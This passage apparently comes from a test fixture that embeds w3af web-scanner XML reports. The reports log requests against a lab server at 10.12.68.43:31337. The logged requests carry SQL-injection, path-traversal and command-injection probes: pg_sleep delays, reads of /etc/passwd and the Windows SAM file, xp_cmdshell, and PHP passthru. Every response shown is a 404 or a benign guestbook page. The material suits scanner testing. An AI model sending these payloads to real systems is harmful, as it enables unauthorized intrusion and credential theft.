                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+pg_sleep%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+pg_sleep%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="860">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about run+ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='run+ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="867">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+pg_sleep%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+pg_sleep%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3af-run>
"""


report_high = r"""<w3af-run start="1432119060" start-long="Wed May 20 12:51:00 2015" version="2.1">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.51
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scan-info target="http://10.12.68.43:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js">
                <config parameter="secure_js_file" value="w3af/plugins/grep/cross_domain_js/secure-js-sources.txt"/>
            </plugin>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="template" value="w3af/plugins/output/html_file/templates/complete.html"/>
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scan-info>
    <vulnerability id="[213, 18, 162, 36, 50, 55, 57, 62, 64, 66, 67, 73, 75, 77, 78, 205, 80, 209, 211, 212, 206, 214, 215, 207, 97, 101, 102, 208, 126, 127]" method="GET" name="Strange header" plugin="strange_headers" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The remote web server sent 18 HTTP responses with the uncommon response header &quot;host&quot;, one of the received header values is &quot;10.12.68.43:31337&quot;. The first ten URLs which sent the uncommon header are:
 - http://10.12.68.43:31337/admin-console/
 - http://10.12.68.43:31337/web-console/ServerInfo.jsp
 - http://10.12.68.43:31337/status
 - http://10.12.68.43:31337/10.gzip
 - http://10.12.68.43:31337/
 - http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll
 - http://10.12.68.43:31337/fGSzl
 - http://10.12.68.43:31337/WebConsole/Invoker
 - http://10.12.68.43:31337/_vti_inf.html
 - http://10.12.68.43:31337/10.zip
</description>
        <http-transactions>
            <http-transaction id="213">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="162">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="36">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=OPxOuc2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="50">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/fGSzl HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">0gd1hq</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="55">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="57">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="62">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=id&amp;uname%20-a= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="64">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=%3C%3F%20passthru%28%22id%22%29&amp;%3F%3E= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="66">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%20c%3A%5C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="67">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=type%20c%3A%5Cwinnt%5Crepair%5Csam._ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="73">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=ps%20-aux HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="75">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=..%2F..%2F..%2F..%2Fbin%2Fchgrp%20nobody%20%2Fetc%2Fshadow%7C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="77">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=SELECT%20TOP%201%20name%20FROM%20sysusers HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="78">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=exec%20master..xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="80">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?Ye4Vxi9=exec%20xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
